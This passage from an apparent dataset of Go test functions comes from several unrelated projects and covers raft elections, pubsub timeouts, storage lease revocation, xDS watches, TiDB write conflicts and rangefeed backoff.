pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func TestReplicaNetwork_Failure_Resilience(t *testing.T) {\n\tnew(test.Consistency).Run(t, newReplicatedNetwork(network.NewNodeDownEvent(5, 30)))\n}", "func TestTimeout(t *testing.T) {\n\tgo func() {\n\t\ttime.Sleep(10 * time.Second)\n\t\tt.Fatal()\n\t}()\n\n\tpub, sub := testClients(t, 500*time.Millisecond)\n\trequire.Nil(t, sub.Subscribe(\"timeoutTestChannel\").Err)\n\n\tr := sub.Receive() // should timeout after a second\n\tassert.Equal(t, Error, r.Type)\n\tassert.NotNil(t, r.Err)\n\tassert.True(t, r.Timeout())\n\n\twaitCh := make(chan struct{})\n\tgo func() {\n\t\tr = sub.Receive()\n\t\tclose(waitCh)\n\t}()\n\trequire.Nil(t, pub.Cmd(\"PUBLISH\", \"timeoutTestChannel\", \"foo\").Err)\n\t<-waitCh\n\n\tassert.Equal(t, Message, r.Type)\n\tassert.Equal(t, \"timeoutTestChannel\", r.Channel)\n\tassert.Equal(t, \"foo\", r.Message)\n\tassert.Nil(t, r.Err, \"%s\", r.Err)\n\tassert.False(t, r.Timeout())\n}", "func delayedRevoke(key string, f func() bool) bool {\n\tif cacheKey(key) {\n\t\treturn true\n\t}\n\n\t// trigger a delayed revocation in background\n\tvar replyP *storageproto.PutReply\n\tvar err error\n\tputCh := make(chan bool)\n\tdoneCh := make(chan bool)\n\tgo func() {\n\t\t// put key1 again to trigger a revoke\n\t\treplyP, err = st.Put(key, \"new-value\")\n\t\tputCh <- true\n\t}()\n\t// ensure Put has gotten to server\n\ttime.Sleep(100 * time.Millisecond)\n\n\t// run rest of function in go routine to allow for timeouts\n\tgo func() {\n\t\t// run rest of test function\n\t\tret := f()\n\t\t// wait for put to complete\n\t\t<-putCh\n\t\t// check for failures\n\t\tif ret {\n\t\t\tdoneCh <- true\n\t\t\treturn\n\t\t}\n\t\tif checkErrorStatus(err, replyP.Status, storageproto.OK) {\n\t\t\tdoneCh <- true\n\t\t\treturn\n\t\t}\n\t\tdoneCh <- false\n\t}()\n\n\t// wait for test completion or timeout\n\tselect {\n\tcase ret := <-doneCh:\n\t\treturn ret\n\tcase <-time.After((storageproto.LEASE_SECONDS + storageproto.LEASE_GUARD_SECONDS + 1) * time.Second):\n\t\tbreak\n\t}\n\tfmt.Fprintln(output, \"FAIL: timeout, may erroneously increase test count\")\n\tfailCount++\n\treturn true\n}", "func TestClient_Unsubscribe_Err(t *testing.T) {\n\tc := OpenClient(0)\n\tdefer c.Close()\n\tif err := c.Unsubscribe(123, 100); err == nil || err.Error() != `replica not found` {\n\t\tt.Fatalf(\"unexpected error: %v\", err)\n\t}\n}", "func TestReconcileClusterServiceBrokerFailureOnFinalRetry(t *testing.T) {\n\tfakeKubeClient, fakeCatalogClient, fakeClusterServiceBrokerClient, testController, _ := newTestController(t, fakeosb.FakeClientConfiguration{\n\t\tCatalogReaction: &fakeosb.CatalogReaction{\n\t\t\tError: errors.New(\"ooops\"),\n\t\t},\n\t})\n\n\tbroker := getTestClusterServiceBroker()\n\tstartTime := metav1.NewTime(time.Now().Add(-7 * 24 * time.Hour))\n\tbroker.Status.OperationStartTime = &startTime\n\n\tif err := reconcileClusterServiceBroker(t, testController, broker); err != nil {\n\t\tt.Fatalf(\"Should have return no error because the retry duration has elapsed: %v\", err)\n\t}\n\n\tbrokerActions := fakeClusterServiceBrokerClient.Actions()\n\tassertNumberOfClusterServiceBrokerActions(t, brokerActions, 1)\n\tassertGetCatalog(t, brokerActions[0])\n\n\tactions := fakeCatalogClient.Actions()\n\tassertNumberOfActions(t, actions, 2)\n\n\tupdatedClusterServiceBroker := assertUpdateStatus(t, actions[0], broker)\n\tassertClusterServiceBrokerReadyFalse(t, updatedClusterServiceBroker)\n\n\tupdatedClusterServiceBroker = assertUpdateStatus(t, actions[1], broker)\n\tassertClusterServiceBrokerCondition(t, updatedClusterServiceBroker, v1beta1.ServiceBrokerConditionFailed, v1beta1.ConditionTrue)\n\tassertClusterServiceBrokerOperationStartTimeSet(t, updatedClusterServiceBroker, false)\n\n\tassertNumberOfActions(t, fakeKubeClient.Actions(), 0)\n\n\tevents := getRecordedEvents(testController)\n\n\texpectedEventPrefixes := []string{\n\t\twarningEventBuilder(errorFetchingCatalogReason).String(),\n\t\twarningEventBuilder(errorReconciliationRetryTimeoutReason).String(),\n\t}\n\n\tif err := checkEventPrefixes(events, expectedEventPrefixes); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestRaftFreesReadOnlyMem(t *testing.T) {\n\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(sm)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tsm.raftLog.commitTo(sm.raftLog.lastIndex())\n\n\tctx := []byte(\"ctx\")\n\n\t// leader starts linearizable read request.\n\t// more info: raft dissertation 6.4, step 2.\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: ctx}}})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want 1\", len(msgs))\n\t}\n\tif msgs[0].Type != pb.MsgHeartbeat {\n\t\tt.Fatalf(\"type = %v, want MsgHeartbeat\", msgs[0].Type)\n\t}\n\tif !bytes.Equal(msgs[0].Context, ctx) {\n\t\tt.Fatalf(\"Context = %v, want %v\", msgs[0].Context, ctx)\n\t}\n\tif len(sm.readOnly.readIndexQueue) != 1 {\n\t\tt.Fatalf(\"len(readIndexQueue) = %v, want 1\", len(sm.readOnly.readIndexQueue))\n\t}\n\tif len(sm.readOnly.pendingReadIndex) != 1 {\n\t\tt.Fatalf(\"len(pendingReadIndex) = %v, want 1\", len(sm.readOnly.pendingReadIndex))\n\t}\n\tif _, ok := sm.readOnly.pendingReadIndex[string(ctx)]; !ok {\n\t\tt.Fatalf(\"can't find context %v in pendingReadIndex \", ctx)\n\t}\n\n\t// heartbeat responses from majority of followers (1 in this case)\n\t// acknowledge the authority of the leader.\n\t// more info: raft dissertation 6.4, step 3.\n\tsm.Step(pb.Message{From: 2, Type: pb.MsgHeartbeatResp, Context: ctx})\n\tif len(sm.readOnly.readIndexQueue) != 0 {\n\t\tt.Fatalf(\"len(readIndexQueue) = %v, want 0\", len(sm.readOnly.readIndexQueue))\n\t}\n\tif len(sm.readOnly.pendingReadIndex) != 0 {\n\t\tt.Fatalf(\"len(pendingReadIndex) = %v, want 0\", len(sm.readOnly.pendingReadIndex))\n\t}\n\tif _, ok := sm.readOnly.pendingReadIndex[string(ctx)]; ok {\n\t\tt.Fatalf(\"found context %v in pendingReadIndex, want none\", ctx)\n\t}\n}", "func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) {\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\ttimeouts := make(map[int]bool)\n\tfor round := 0; round < 50*et; round++ {\n\t\tswitch state {\n\t\tcase StateFollower:\n\t\t\tr.becomeFollower(r.Term+1, 2)\n\t\tcase StateCandidate:\n\t\t\tr.becomeCandidate()\n\t\t}\n\n\t\ttime := 0\n\t\tfor len(r.readMessages()) == 0 {\n\t\t\tr.tick()\n\t\t\ttime++\n\t\t}\n\t\ttimeouts[time] = true\n\t}\n\n\tfor d := et + 1; d < 2*et; d++ {\n\t\tif !timeouts[d] {\n\t\t\tt.Errorf(\"timeout in %d ticks should happen\", d)\n\t\t}\n\t}\n}", "func (s) TestEDSWatch_ValidResponseCancelsExpiryTimerBehavior(t *testing.T) {\n\toverrideFedEnvVar(t)\n\tmgmtServer, err := e2e.StartManagementServer(e2e.ManagementServerOptions{})\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to spin up the xDS management server: %v\", err)\n\t}\n\tdefer mgmtServer.Stop()\n\n\t// Create an xDS client talking to the above management server.\n\tnodeID := uuid.New().String()\n\tclient, close, err := xdsclient.NewWithConfigForTesting(&bootstrap.Config{\n\t\tXDSServer: xdstestutils.ServerConfigForAddress(t, mgmtServer.Address),\n\t\tNodeProto: &v3corepb.Node{Id: nodeID},\n\t}, defaultTestWatchExpiryTimeout, time.Duration(0))\n\tif err != nil {\n\t\tt.Fatalf(\"failed to create xds client: %v\", err)\n\t}\n\tdefer close()\n\n\t// Register a watch for an endpoint resource and have the watch callback\n\t// push the received update on to a channel.\n\tew := newEndpointsWatcher()\n\tedsCancel := xdsresource.WatchEndpoints(client, edsName, ew)\n\tdefer edsCancel()\n\n\t// Configure the management server to return a single endpoint resource,\n\t// corresponding to the one we registered a watch for.\n\tresources := e2e.UpdateOptions{\n\t\tNodeID: nodeID,\n\t\tEndpoints: []*v3endpointpb.ClusterLoadAssignment{e2e.DefaultEndpoint(edsName, edsHost1, []uint32{edsPort1})},\n\t\tSkipValidation: true,\n\t}\n\tctx, cancel := context.WithTimeout(context.Background(), defaultTestTimeout)\n\tdefer cancel()\n\tif err := mgmtServer.Update(ctx, resources); err != nil {\n\t\tt.Fatalf(\"Failed to update management server with resources: %v, err: %v\", resources, err)\n\t}\n\n\t// Verify the contents of the received update.\n\twantUpdate := endpointsUpdateErrTuple{\n\t\tupdate: xdsresource.EndpointsUpdate{\n\t\t\tLocalities: []xdsresource.Locality{\n\t\t\t\t{\n\t\t\t\t\tEndpoints: []xdsresource.Endpoint{{Address: fmt.Sprintf(\"%s:%d\", edsHost1, edsPort1), Weight: 1}},\n\t\t\t\t\tID: internal.LocalityID{\n\t\t\t\t\t\tRegion: \"region-1\",\n\t\t\t\t\t\tZone: \"zone-1\",\n\t\t\t\t\t\tSubZone: \"subzone-1\",\n\t\t\t\t\t},\n\t\t\t\t\tPriority: 0,\n\t\t\t\t\tWeight: 1,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\tif err := verifyEndpointsUpdate(ctx, ew.updateCh, wantUpdate); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Wait for the watch expiry timer to fire, and verify that the callback is\n\t// not invoked.\n\t<-time.After(defaultTestWatchExpiryTimeout)\n\tif err := verifyNoEndpointsUpdate(ctx, ew.updateCh); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func TestFailWrongAmount(t *testing.T) {\n\tdefer test.Guard(t)()\n\n\ttest := func(t *testing.T, modifier func(*serverMock),\n\t\texpectedErr error) {\n\n\t\tctx := createClientTestContext(t, nil)\n\n\t\t// Modify mock for this subtest.\n\t\tmodifier(ctx.serverMock)\n\n\t\t_, _, err := ctx.swapClient.LoopOut(\n\t\t\tcontext.Background(), testRequest,\n\t\t)\n\t\tif err != expectedErr {\n\t\t\tt.Fatalf(\"Expected %v, but got %v\", expectedErr, err)\n\t\t}\n\t\tctx.finish()\n\t}\n\n\tt.Run(\"swap fee too high\", func(t *testing.T) {\n\t\ttest(t, func(m *serverMock) {\n\t\t\tm.swapInvoiceAmt += 10\n\t\t}, ErrSwapFeeTooHigh)\n\t})\n\n\tt.Run(\"prepay amount too high\", func(t *testing.T) {\n\t\ttest(t, func(m *serverMock) {\n\t\t\t// Keep total swap fee unchanged, but increase prepaid\n\t\t\t// portion.\n\t\t\tm.swapInvoiceAmt -= 10\n\t\t\tm.prepayInvoiceAmt += 10\n\t\t}, ErrPrepayAmountTooHigh)\n\t})\n\n}", "func TestRecoverAlertsPostOutage(t *testing.T) {\n\t// Test Setup\n\t// alert FOR 30m, already ran for 10m, outage down at 15m prior to now(), outage tolerance set to 1hr\n\t// EXPECTATION: for state for alert restores to 10m+(now-15m)\n\n\t// FIRST set up 1 Alert rule with 30m FOR duration\n\talertForDuration, _ := time.ParseDuration(\"30m\")\n\tmockRules := map[string]rulespb.RuleGroupList{\n\t\t\"user1\": {\n\t\t\t&rulespb.RuleGroupDesc{\n\t\t\t\tName: \"group1\",\n\t\t\t\tNamespace: \"namespace1\",\n\t\t\t\tUser: \"user1\",\n\t\t\t\tRules: []*rulespb.RuleDesc{\n\t\t\t\t\t{\n\t\t\t\t\t\tAlert: \"UP_ALERT\",\n\t\t\t\t\t\tExpr: \"1\", // always fire for this test\n\t\t\t\t\t\tFor: alertForDuration,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tInterval: interval,\n\t\t\t},\n\t\t},\n\t}\n\n\t// NEXT, set up ruler config with outage tolerance = 1hr\n\tstore := newMockRuleStore(mockRules)\n\trulerCfg := defaultRulerConfig(t)\n\trulerCfg.OutageTolerance, _ = time.ParseDuration(\"1h\")\n\n\t// NEXT, set up mock distributor containing sample,\n\t// metric: ALERTS_FOR_STATE{alertname=\"UP_ALERT\"}, ts: time.now()-15m, value: time.now()-25m\n\tcurrentTime := time.Now().UTC()\n\tdownAtTime := currentTime.Add(time.Minute * -15)\n\tdownAtTimeMs := downAtTime.UnixNano() / int64(time.Millisecond)\n\tdownAtActiveAtTime := currentTime.Add(time.Minute * -25)\n\tdownAtActiveSec := downAtActiveAtTime.Unix()\n\td := &querier.MockDistributor{}\n\td.On(\"Query\", mock.Anything, mock.Anything, mock.Anything, mock.Anything).Return(\n\t\tmodel.Matrix{\n\t\t\t&model.SampleStream{\n\t\t\t\tMetric: model.Metric{\n\t\t\t\t\tlabels.MetricName: \"ALERTS_FOR_STATE\",\n\t\t\t\t\t// user1's only alert rule\n\t\t\t\t\tlabels.AlertName: model.LabelValue(mockRules[\"user1\"][0].GetRules()[0].Alert),\n\t\t\t\t},\n\t\t\t\tValues: []model.SamplePair{{Timestamp: model.Time(downAtTimeMs), Value: model.SampleValue(downAtActiveSec)}},\n\t\t\t},\n\t\t},\n\t\tnil)\n\td.On(\"MetricsForLabelMatchers\", mock.Anything, mock.Anything, mock.Anything, mock.Anything).Panic(\"This should not be called for the ruler use-cases.\")\n\tquerierConfig := querier.DefaultQuerierConfig()\n\tquerierConfig.IngesterStreaming = false\n\n\t// set up an empty store\n\tqueryables := []querier.QueryableWithFilter{\n\t\tquerier.UseAlwaysQueryable(newEmptyQueryable()),\n\t}\n\n\t// create a ruler but don't start it. instead, we'll evaluate the rule groups manually.\n\tr := buildRuler(t, rulerCfg, &querier.TestConfig{Cfg: querierConfig, Distributor: d, Stores: queryables}, store, nil)\n\tr.syncRules(context.Background(), rulerSyncReasonInitial)\n\n\t// assert initial state of rule group\n\truleGroup := r.manager.GetRules(\"user1\")[0]\n\trequire.Equal(t, time.Time{}, ruleGroup.GetLastEvaluation())\n\trequire.Equal(t, \"group1\", ruleGroup.Name())\n\trequire.Equal(t, 1, len(ruleGroup.Rules()))\n\n\t// assert initial state of rule within rule group\n\talertRule := ruleGroup.Rules()[0]\n\trequire.Equal(t, time.Time{}, alertRule.GetEvaluationTimestamp())\n\trequire.Equal(t, \"UP_ALERT\", alertRule.Name())\n\trequire.Equal(t, promRules.HealthUnknown, alertRule.Health())\n\n\t// NEXT, evaluate the rule group the first time and assert\n\tctx := user.InjectOrgID(context.Background(), \"user1\")\n\truleGroup.Eval(ctx, currentTime)\n\n\t// since the eval is done at the current timestamp, the activeAt timestamp of alert should equal current timestamp\n\trequire.Equal(t, \"UP_ALERT\", alertRule.Name())\n\trequire.Equal(t, promRules.HealthGood, alertRule.Health())\n\n\tactiveMapRaw := reflect.ValueOf(alertRule).Elem().FieldByName(\"active\")\n\tactiveMapKeys := activeMapRaw.MapKeys()\n\trequire.True(t, len(activeMapKeys) == 1)\n\n\tactiveAlertRuleRaw := activeMapRaw.MapIndex(activeMapKeys[0]).Elem()\n\tactiveAtTimeRaw := activeAlertRuleRaw.FieldByName(\"ActiveAt\")\n\n\trequire.Equal(t, promRules.StatePending, promRules.AlertState(activeAlertRuleRaw.FieldByName(\"State\").Int()))\n\trequire.Equal(t, reflect.NewAt(activeAtTimeRaw.Type(), unsafe.Pointer(activeAtTimeRaw.UnsafeAddr())).Elem().Interface().(time.Time), currentTime)\n\n\t// NEXT, restore the FOR state and assert\n\truleGroup.RestoreForState(currentTime)\n\n\trequire.Equal(t, \"UP_ALERT\", alertRule.Name())\n\trequire.Equal(t, promRules.HealthGood, alertRule.Health())\n\trequire.Equal(t, promRules.StatePending, promRules.AlertState(activeAlertRuleRaw.FieldByName(\"State\").Int()))\n\trequire.Equal(t, reflect.NewAt(activeAtTimeRaw.Type(), unsafe.Pointer(activeAtTimeRaw.UnsafeAddr())).Elem().Interface().(time.Time), downAtActiveAtTime.Add(currentTime.Sub(downAtTime)))\n\n\t// NEXT, 20 minutes is expected to be left, eval timestamp at currentTimestamp +20m\n\tcurrentTime = currentTime.Add(time.Minute * 20)\n\truleGroup.Eval(ctx, currentTime)\n\n\t// assert alert state after alert is firing\n\tfiredAtRaw := activeAlertRuleRaw.FieldByName(\"FiredAt\")\n\tfiredAtTime := reflect.NewAt(firedAtRaw.Type(), unsafe.Pointer(firedAtRaw.UnsafeAddr())).Elem().Interface().(time.Time)\n\trequire.Equal(t, firedAtTime, currentTime)\n\n\trequire.Equal(t, promRules.StateFiring, promRules.AlertState(activeAlertRuleRaw.FieldByName(\"State\").Int()))\n}", "func TestRequestDataEpochMismatch(t *testing.T) {\n\tjob := \"TestRequestDataEpochMismatch\"\n\tm := etcdutil.StartNewEtcdServer(t, job)\n\tdefer m.Terminate(t)\n\tetcdURLs := []string{m.URL()}\n\tcontroller := controller.New(job, etcd.NewClient(etcdURLs), 1)\n\tcontroller.Start()\n\tdefer controller.Stop()\n\n\tfw := &framework{\n\t\tname: job,\n\t\tetcdURLs: etcdURLs,\n\t\tln: createListener(t),\n\t}\n\tvar wg sync.WaitGroup\n\tfw.SetTaskBuilder(&testableTaskBuilder{\n\t\tsetupLatch: &wg,\n\t})\n\tfw.SetTopology(example.NewTreeTopology(1, 1))\n\twg.Add(1)\n\tgo fw.Start()\n\tdefer fw.ShutdownJob()\n\twg.Wait()\n\n\taddr, err := etcdutil.GetAddress(fw.etcdClient, job, fw.GetTaskID())\n\tif err != nil {\n\t\tt.Fatalf(\"GetAddress failed: %v\", err)\n\t}\n\t_, err = frameworkhttp.RequestData(addr, \"req\", 0, fw.GetTaskID(), 10, fw.GetLogger())\n\t// if err.Error() != \"epoch mismatch\" {\n\tif err != frameworkhttp.ErrReqEpochMismatch {\n\t\tt.Fatalf(\"error want = (epoch mismatch), but get = (%s)\", err.Error())\n\t}\n}", "func TestConflictErrorInDeleteInRR(t *testing.T) {\n\trequire.NoError(t, failpoint.Enable(\"github.com/pingcap/tidb/executor/assertPessimisticLockErr\", \"return\"))\n\tstore := testkit.CreateMockStore(t)\n\n\ttk := testkit.NewTestKit(t, store)\n\tdefer tk.MustExec(\"rollback\")\n\tse := tk.Session()\n\ttk2 := testkit.NewTestKit(t, store)\n\tdefer tk2.MustExec(\"rollback\")\n\n\ttk.MustExec(\"use test\")\n\ttk2.MustExec(\"use test\")\n\ttk.MustExec(\"create table t (id int primary key, v int)\")\n\ttk.MustExec(\"insert into t values (1, 1), (2, 2)\")\n\n\ttk.MustExec(\"begin pessimistic\")\n\ttk2.MustExec(\"insert into t values (3, 1)\")\n\tse.SetValue(sessiontxn.AssertLockErr, nil)\n\ttk.MustExec(\"delete from t where v = 1\")\n\t_, ok := se.Value(sessiontxn.AssertLockErr).(map[string]int)\n\trequire.False(t, ok)\n\ttk.MustQuery(\"select * from t\").Check(testkit.Rows(\"2 2\"))\n\ttk.MustExec(\"commit\")\n\n\ttk.MustExec(\"begin pessimistic\")\n\t// However, if sub select in delete is point get, we will incur one write conflict\n\ttk2.MustExec(\"update t set id = 1 where id = 2\")\n\tse.SetValue(sessiontxn.AssertLockErr, nil)\n\ttk.MustExec(\"delete from t where id = 1\")\n\n\trecords, ok := se.Value(sessiontxn.AssertLockErr).(map[string]int)\n\trequire.True(t, ok)\n\trequire.Equal(t, records[\"errWriteConflict\"], 1)\n\ttk.MustQuery(\"select * from t for update\").Check(testkit.Rows())\n\n\ttk.MustExec(\"rollback\")\n\trequire.NoError(t, failpoint.Disable(\"github.com/pingcap/tidb/executor/assertPessimisticLockErr\"))\n}", "func TestDownloadInterruptedAfterSendingRevision(t *testing.T) {\n\ttestDownloadInterrupted(t, newDependencyInterruptDownloadAfterSendingRevision())\n}", "func TestProbeLongterm(t *testing.T) {\n\n\t// Create and register consumer.\n\tac, in := newUpdateConsumer(t)\n\tdefer ac.Close()\n\n\t// Create UDP client.\n\tmc := udpecho.Dial(udpServ)\n\n\t// Filter BPF Events based on client port.\n\tout := filterSourcePort(in, mc.ClientPort())\n\n\t// Clear the connection startup burst to make sure it's not interfering\n\t// with our test suite. Send 16 two-way packets and read 4 events.\n\tmc.Ping(16)\n\tfor i := 0; i < 4; i++ {\n\t\t_, err := readTimeout(out, 10)\n\t\tassert.NoError(t, err)\n\t}\n\n\t// Ensure all events are drained.\n\tev, err := readTimeout(out, 20)\n\tassert.EqualError(t, err, \"timeout\", ev.String())\n\n\t// Wait for at least one cooldown period, send a one-way packet.\n\ttime.Sleep(cd * time.Millisecond)\n\tmc.Nop(1)\n\n\t// Expect 33rd packet in this message.\n\tev, err = readTimeout(out, 20)\n\trequire.NoError(t, err)\n\tassert.EqualValues(t, 33, ev.PacketsOrig+ev.PacketsRet, ev.String())\n\n\t// Expect 34th packet in this message.\n\ttime.Sleep(cd * time.Millisecond)\n\tmc.Nop(1)\n\tev, err = readTimeout(out, 20)\n\trequire.NoError(t, err)\n\tassert.EqualValues(t, 34, ev.PacketsOrig+ev.PacketsRet, ev.String())\n\n\t// Further attempt(s) to read from the channel should time out.\n\tev, err = readTimeout(out, 10)\n\tassert.EqualError(t, err, \"timeout\", ev.String())\n\n\trequire.NoError(t, acctProbe.RemoveConsumer(ac))\n}", "func TestValidateTerminateMachineMessage(t *testing.T) {\n\t// TerminateMachineMessage with MachineID => should pass validation\n\tm := TerminateMachineMessage{MachineID: \"i-1234567\"}\n\terr := m.Validate()\n\trequire.Nil(t, err, \"expected validation to succeed\")\n\n\t// TerminateMachineMessage missing MachineID => should fail validation\n\tm = TerminateMachineMessage{}\n\terr = m.Validate()\n\trequire.NotNil(t, err, \"expected validation to fail due to missing machineId\")\n\trequire.Equal(t, fmt.Errorf(\"terminateMachine message did not specify a machineId\"), err, \"unexpected validation error\")\n}", "func TestAcceptFail(t *testing.T) {\n\tdoh := newFakeTransport()\n\tclient, server := makePair()\n\n\t// Start the forwarder running.\n\tgo Accept(doh, server)\n\n\tlbuf := make([]byte, 2)\n\t// Send Query\n\tqueryData := simpleQueryBytes\n\tbinary.BigEndian.PutUint16(lbuf, uint16(len(queryData)))\n\tclient.Write(lbuf)\n\tclient.Write(queryData)\n\n\t// Indicate that the query failed\n\tdoh.err = errors.New(\"fake error\")\n\n\t// Read query\n\tqueryRead := <-doh.query\n\tif !bytes.Equal(queryRead, queryData) {\n\t\tt.Error(\"Query mismatch\")\n\t}\n\n\t// Accept should have closed the socket.\n\tn, _ := client.Read(lbuf)\n\tif n != 0 {\n\t\tt.Error(\"Expected to read 0 bytes\")\n\t}\n}", "func testDelayedRevokeWithUpdate3() {\n\tst.SetDelay(2) // lease expires before revocation completes\n\tdefer st.ResetDelay()\n\n\tkey1 := \"revokekey:8\"\n\n\t// function called during revoke of key1\n\tf := func() bool {\n\t\t// sleep here until lease expires on the remote server\n\t\ttime.Sleep((storageproto.LEASE_SECONDS + storageproto.LEASE_GUARD_SECONDS) * time.Second)\n\n\t\t// put key1, this should not block\n\t\tts := time.Now()\n\t\treplyP, err := st.Put(key1, \"newnew-value\")\n\t\tif checkErrorStatus(err, replyP.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif !isTimeOK(time.Since(ts)) {\n\t\t\tfmt.Fprintln(output, \"FAIL: storage server should not block this Put\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\t// get key1 and want lease, this should not block\n\t\tts = time.Now()\n\t\treplyG, err := st.Get(key1, true)\n\t\tif checkErrorStatus(err, replyG.Status, storageproto.OK) {\n\t\t\treturn true\n\t\t}\n\t\tif replyG.Value != \"newnew-value\" {\n\t\t\tfmt.Fprintln(output, \"FAIL: got wrong value\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\tif !isTimeOK(time.Since(ts)) {\n\t\t\tfmt.Fprintln(output, \"FAIL: storage server should not block this Get\")\n\t\t\tfailCount++\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\n\tif delayedRevoke(key1, f) {\n\t\treturn\n\t}\n\tfmt.Fprintln(output, \"PASS\")\n\tpassCount++\n}", "func TestBackoffOnRangefeedFailure(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\n\tvar called int64\n\tconst timesToFail = 3\n\trpcKnobs := rpc.ContextTestingKnobs{\n\t\tStreamClientInterceptor: func(\n\t\t\ttarget string, class rpc.ConnectionClass,\n\t\t) grpc.StreamClientInterceptor {\n\t\t\treturn func(\n\t\t\t\tctx context.Context, desc *grpc.StreamDesc, cc *grpc.ClientConn,\n\t\t\t\tmethod string, streamer grpc.Streamer, opts ...grpc.CallOption,\n\t\t\t) (stream grpc.ClientStream, err error) {\n\t\t\t\tif strings.Contains(method, \"RangeFeed\") &&\n\t\t\t\t\tatomic.AddInt64(&called, 1) <= timesToFail {\n\t\t\t\t\treturn nil, errors.Errorf(\"boom\")\n\t\t\t\t}\n\t\t\t\treturn streamer(ctx, desc, cc, method, 